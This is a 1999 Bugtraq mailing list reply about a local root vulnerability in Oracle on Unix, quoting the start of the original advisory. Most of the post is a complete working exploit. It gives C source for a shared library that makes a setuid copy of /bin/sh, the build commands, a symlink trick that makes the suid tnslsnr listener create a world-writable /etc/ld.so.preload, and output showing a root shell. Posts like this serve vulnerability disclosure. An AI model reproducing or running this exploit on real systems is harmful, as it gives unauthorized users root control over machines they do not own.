Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Oracle 8 root exploit

From: martinmv () HORNET CZ (Martin Mevald)
Date: Mon, 15 Nov 1999 16:51:54 +0100

Greetings,

Oracle 7.3.4 is vulnerable too.

$ uname -a
SunOS sun450 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-4

---

Linux: Oracle version: 8.0.5

There isn't dbsnmp with suid bit on Linux. There is tnslsnr.

Program dump file listener.log:

        open("listener.log", O_WRONLY|O_APPEND|O_CREAT, 0666)

Exploit:

oracle-ex.c
--------------------------

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{

  if (!geteuid()) {

  remove("/etc/ld.so.preload");

  execl("/bin/bash","bash","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);

  }

}
---------------------------

$ gcc -o oracle-ex.o -c oracle-ex.c -fPIC
$ gcc  -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 oracle-ex.o -nostartfiles

$  unset ORACLE_HOME

$  umask 0000
$  ln -s /etc/ld.so.preload  /tmp/listener.log
$  /u01/app/oracle/product/8.0.5/bin/tnslsnr

$ echo /tmp/libno_ex.so.1.0 >/etc/ld.so.preload

$ telnet localhost

Trying ...
Connected to localhost.localdomain.
Escape character is '^]'.
Connection closed by foreign host.

$ ./xxxx
#

Martin Mevald, martinmv () hornet cz

On Sat, 13 Nov 1999, Tellier, Brock wrote:


Greetings,

OVERVIEW
A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user
to obtain root privileges.
Previous By Date Next
Previous By Thread Next

Current thread: